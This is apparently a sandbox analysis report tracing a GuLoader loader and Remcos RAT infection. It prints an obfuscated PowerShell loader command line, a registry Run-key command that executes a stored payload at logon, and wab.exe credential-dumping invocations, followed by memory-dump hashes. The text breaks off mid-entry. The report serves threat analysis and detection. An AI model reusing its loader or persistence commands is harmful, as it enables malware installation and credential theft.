SupernFleshlglestrasVdderetAkti.li EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling: SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi: Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5 Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;"
                                                                                Imagebase:0x140000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000F.00000002.1858724524.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000F.00000002.1850677246.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.1859111594.000000000C9DD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:15:40:14
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
                                                                                Imagebase:0x410000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:16:49:50
                                                                                Start date:18/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                Imagebase:0x490000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:20
                                                                                Start time:16:50:05
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
                                                                                Imagebase:0x410000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:16:50:05
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff75da10000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:16:50:05
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
                                                                                Imagebase:0x4f0000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:25
                                                                                Start time:16:50:14
                                                                                Start date:18/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
                                                                                Imagebase:0x490000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:26
                                                                                Start time:16:50:14
                                                                                Start date:18/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
                                                                                Imagebase:0x490000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:27
                                                                                Start time:16:50:14
                                                                                Start date:18/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"
                                                                                Imagebase:0x490000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:28
                                                                                Start time:16:50:14
                                                                                Start date:18/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"
                                                                                Imagebase:0x490000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Reset < >
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2820d8d60883de5cebaec6ab09408dbe00df672af19376227472d2ee0b4b9597
                                                                                  • Instruction ID: acc85e7862648d8874b233e292ecb381ef061587bfc7130880555fcf1d330515
                                                                                  • Opcode Fuzzy Hash: 2820d8d60883de5cebaec6ab09408dbe00df672af19376227472d2ee0b4b9597
                                                                                  • Instruction Fuzzy Hash: 6CF1D270908A8D8FEBA8DF28C855BE977D1FF55300F44826EE84EC7291CB35D9558B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 49402f698e436d67857977934060dc90ebe1b60e83d2c4490575b67ba86784b0
                                                                                  • Instruction ID: a540e064802065c37e28c14528d10194b036d855fbfe98574989a6c25834a0ad
                                                                                  • Opcode Fuzzy Hash: 49402f698e436d67857977934060dc90ebe1b60e83d2c4490575b67ba86784b0
                                                                                  • Instruction Fuzzy Hash: 67E1E270A08A4E8FEBA8DF28D855BE977D1FB55310F04826ED84DC7291CE79E8548BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2262343498.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac470000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5dfa648af5cada6dd1874b4425de8b3cef055f8d90525dc9a307e8aa90023885
                                                                                  • Instruction ID: 3bde5c919b4ab93b1234facf200da1787d7276f675250349d145edfe879afa41
                                                                                  • Opcode Fuzzy Hash: 5dfa648af5cada6dd1874b4425de8b3cef055f8d90525dc9a307e8aa90023885
                                                                                  • Instruction Fuzzy Hash: AEE18E72A0EBDA8FF795DB2888595B47BE1FF56328B1841BAD04DC31D3CE18D8098785
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2262343498.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac470000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4da1e5545b8424bca74675e394b61b746d7d4c08cebee57c9d044e5a1db7e092
                                                                                  • Instruction ID: 3d500a49203499cee73aae0c9277d0c7b341551650e366848d3e90d933190473
                                                                                  • Opcode Fuzzy Hash: 4da1e5545b8424bca74675e394b61b746d7d4c08cebee57c9d044e5a1db7e092
                                                                                  • Instruction Fuzzy Hash: 67B16971A0EB9A8FFB959B2C98196B47BD1EF46224B1841FAD04DCB1D3DE18DC0983C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2f0eecdca64a636b26f5c70c991992373cd3fcb0ab741c2ae32402ddebb0065c
                                                                                  • Instruction ID: 5191bab8b348cb5f76e1d12ea4284b4d53a2804014e1e00a42b01173b55741ab
                                                                                  • Opcode Fuzzy Hash: 2f0eecdca64a636b26f5c70c991992373cd3fcb0ab741c2ae32402ddebb0065c
                                                                                  • Instruction Fuzzy Hash: 3481287061CE498FE789EB1CC495EB5B7D1FF95710B10457DD08EC32A2DA2AE846C781
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2262343498.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac470000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7242c38d3e5342eee67cfe84b34a9125734280a0dbbb7969c4d348e303da4351
                                                                                  • Instruction ID: 80a6134be0b8b186bb2725c63df9fcc9614b9bc5cf70ab7d1aed7ad32896c399
                                                                                  • Opcode Fuzzy Hash: 7242c38d3e5342eee67cfe84b34a9125734280a0dbbb7969c4d348e303da4351
                                                                                  • Instruction Fuzzy Hash: 6C517A62E0FAD78FF795D72888199B8AAD1EF43268B5855B9D04DC31D3CE18DC088BC5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2262343498.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac470000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21486bc5483e66c202a990bef138dc56e7be37d5a5454735211c4ab7bfe6a913
                                                                                  • Instruction ID: c17488feca445997b3941761c9e907984481290b07f2d430f658308ee2e384ac
                                                                                  • Opcode Fuzzy Hash: 21486bc5483e66c202a990bef138dc56e7be37d5a5454735211c4ab7bfe6a913
                                                                                  • Instruction Fuzzy Hash: 67317A62D1FBE78FFBA5932858196B86AC1EF02229B5841BAD04DCB0D3DD0CAC1852C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: f908e6adbe7f4590811c5d236f6411afca4faf0d9f22a769bef1dde228bbf1dd
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 3101677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661D636E891CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5O_^$pw;
                                                                                  • API String ID: 0-1135403008
                                                                                  • Opcode ID: d6bb4bed9e39d0ce0b4a0d6a4e3256b3def2534844b5d255426e6ae91bbd290d
                                                                                  • Instruction ID: baabcdade36c4abb1a5b4a9c4c169fd5cfd5aa7065125b2a334185f1a58866fa
                                                                                  • Opcode Fuzzy Hash: d6bb4bed9e39d0ce0b4a0d6a4e3256b3def2534844b5d255426e6ae91bbd290d
                                                                                  • Instruction Fuzzy Hash: C2E1B25790FBC2DFF313576958658D9BF60EF9366470940F7C1C98A093D90AA82E82F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (e$,S]$;S]I$`e
                                                                                  • API String ID: 0-3768020607
                                                                                  • Opcode ID: c1aa2b7e5f395b138f71c718b36fc8b8d9d8f81739808103b9690184cfb65da6
                                                                                  • Instruction ID: 966db4261b6444b2385c387034e87101fd1f44b7d4ab974f586e6fcb8df49af6
                                                                                  • Opcode Fuzzy Hash: c1aa2b7e5f395b138f71c718b36fc8b8d9d8f81739808103b9690184cfb65da6
                                                                                  • Instruction Fuzzy Hash: 20A1C7A390FFC28FF7068BA85C65465BF91EF63650B1D80F7D08D870A7E816991D83A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2261225325.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_7ffaac3a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (e$,S]$;S]I$`e
                                                                                  • API String ID: 0-3768020607
                                                                                  • Opcode ID: a17953692a31e54ce3b08fdcdeb16f0d91aa70ecedcd2fc100b29efd9e5dea4e
                                                                                  • Instruction ID: 32a4a9a0b5868dcfd97de51078211a0dc96528bed49252523f642b3a75b79750
                                                                                  • Opcode Fuzzy Hash: a17953692a31e54ce3b08fdcdeb16f0d91aa70ecedcd2fc100b29efd9e5dea4e
                                                                                  • Instruction Fuzzy Hash: 7B71C3A394FEC19FF7068EE82C55465BF95EF63650B0880FBD08C874A7E816991D83E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94641a1bc9e9f58e7120b1bcb7a644f98a69b85bada2b9d5c78b52ad0af613a3
                                                                                  • Instruction ID: b4845a498e9f12320f620de9898c9c201701e03dfae39ece618aac833d033057
                                                                                  • Opcode Fuzzy Hash: 94641a1bc9e9f58e7120b1bcb7a644f98a69b85bada2b9d5c78b52ad0af613a3
                                                                                  • Instruction Fuzzy Hash: AAE0398960D7D01FD307226428716C57F714B13120B0A01E7E285DF2D3D9094C8A83B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                  • API String ID: 0-663938088
                                                                                  • Opcode ID: ba862106a4ebc045ab02745da0e547d8a8391e0635e2897831a5540416fc5ee1
                                                                                  • Instruction ID: 6d2c6ee8d0c3f6eb214506fa7f090b1d58612272c819092be2122eb3ca8a2185
                                                                                  • Opcode Fuzzy Hash: ba862106a4ebc045ab02745da0e547d8a8391e0635e2897831a5540416fc5ee1
                                                                                  • Instruction Fuzzy Hash: 9D6261B4A003159FEB14DB64C8D4B9EBBB2AF89304F14C169D9056F395CB72DD81CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                  • API String ID: 0-663938088
                                                                                  • Opcode ID: 8ca46a7c00a53bd6fae212d1668947db61157a70e5b4fd146bf7408b7e28fe9d
                                                                                  • Instruction ID: b721a4dfc283a8f0878f0490f745365f635a5a635090939d38bad398e7dbbae7
                                                                                  • Opcode Fuzzy Hash: 8ca46a7c00a53bd6fae212d1668947db61157a70e5b4fd146bf7408b7e28fe9d
                                                                                  • Instruction Fuzzy Hash: 3A6243B4A002199FEB24DF64C994BDDB7B2BB85304F1080E9D9096B795CB71EE81CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                                                  • API String ID: 0-507553569
                                                                                  • Opcode ID: 704483ec2554d3653e88f9000ee8a47428cf38932358291fc02a5fa1b0919ce2
                                                                                  • Instruction ID: 67ec3fba806b4cb710e573b64b65b7d75046f1646821b1cdc2e7fd7b6fe2e342
                                                                                  • Opcode Fuzzy Hash: 704483ec2554d3653e88f9000ee8a47428cf38932358291fc02a5fa1b0919ce2
                                                                                  • Instruction Fuzzy Hash: 4E12C5B9B00205CFDB14CB69D4D8B6ABBF2BF89310F14806AD9059B355DB72DD42CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$$q$$q$$q$$q
                                                                                  • API String ID: 0-1538229613
                                                                                  • Opcode ID: 98da644cdc0bf0b2ce1d20773ad82e54d4ce7d379a377be8dcb056bc2a76fa61
                                                                                  • Instruction ID: 5e918e0ac1300459bf246c41608c3d0bfa5d42a6e04e2a57eeccd79391159b7a
                                                                                  • Opcode Fuzzy Hash: 98da644cdc0bf0b2ce1d20773ad82e54d4ce7d379a377be8dcb056bc2a76fa61
                                                                                  • Instruction Fuzzy Hash: 0BB12EB5B04306CFEB148B69D4C8F7ABBA6EFC5215F14807AD805AB241DB72D9C1C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                                                  • API String ID: 0-170447905
                                                                                  • Opcode ID: dd99bfe5149f3753e38cc1c852c4057616c60b5768d7e276a7533830715bbd25
                                                                                  • Instruction ID: b77c836fd51a0ff897dcf4cf143aff1cf2867cf3abcb6bc5b1b55c42f72153d4
                                                                                  • Opcode Fuzzy Hash: dd99bfe5149f3753e38cc1c852c4057616c60b5768d7e276a7533830715bbd25
                                                                                  • Instruction Fuzzy Hash: F1513871708346DFD7169B25C8D9BAA7F71FF86311F1880AAD9458B281C735C942C762
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q
                                                                                  • API String ID: 0-3126650252
                                                                                  • Opcode ID: f08af65cdd27fd0da0e6db4c3331fd225835628ff101fd490a2f2d91db71d75a
                                                                                  • Instruction ID: ff3a4b119cb0fd0f02a57fb3ae383de02f576ee11f19a76e63235b11aaa921ba
                                                                                  • Opcode Fuzzy Hash: f08af65cdd27fd0da0e6db4c3331fd225835628ff101fd490a2f2d91db71d75a
                                                                                  • Instruction Fuzzy Hash: F30271B4A002059FDB14CB58C8D4B5ABBB2EF89314F14C4A9D9096F355CB72ED86CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tPq$tPq
                                                                                  • API String ID: 0-4270251778
                                                                                  • Opcode ID: c820bad434e9a056cab32ce8048d8749b6c6a2d4613decab540d453789337635
                                                                                  • Instruction ID: 2cdd8f867d0f71cf5568d76e837d14d6eb51fee9258d9f917c153d3c8e1fccd7
                                                                                  • Opcode Fuzzy Hash: c820bad434e9a056cab32ce8048d8749b6c6a2d4613decab540d453789337635
                                                                                  • Instruction Fuzzy Hash: C102A3B0B00245DFD718DB64C4D9BAEBBE2AF89314F148069E905AB395CB72DE41CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q
                                                                                  • API String ID: 0-1467158625
                                                                                  • Opcode ID: 8719a4ced9c1a64a1a9c05987b7d43fa580fa1c0be3e0d8965c9df381929da71
                                                                                  • Instruction ID: aa94c04adb3d1aa5c2c3db44bbc76d18937655f955abf95d15d65ef840abaa61
                                                                                  • Opcode Fuzzy Hash: 8719a4ced9c1a64a1a9c05987b7d43fa580fa1c0be3e0d8965c9df381929da71
                                                                                  • Instruction Fuzzy Hash: 130233B4A00219DFDB24DB24C994BADB7B2BB85304F1081E9D9096B755CB72DEC1CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q
                                                                                  • API String ID: 0-1467158625
                                                                                  • Opcode ID: 69afbdcf9f24799f700ed70ab9456896b8bbaa4dc923c4e7aa3b51c088e89cb6
                                                                                  • Instruction ID: bb07dce939e3cef3e2dfc3c2b28e4f394ed44cb038909dbe6882fa77fda5aa85
                                                                                  • Opcode Fuzzy Hash: 69afbdcf9f24799f700ed70ab9456896b8bbaa4dc923c4e7aa3b51c088e89cb6
                                                                                  • Instruction Fuzzy Hash: 12F194B4A003159FEB24DB54C894F6ABBF2EF84304F10C0A9D9096F796DB71ED818B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
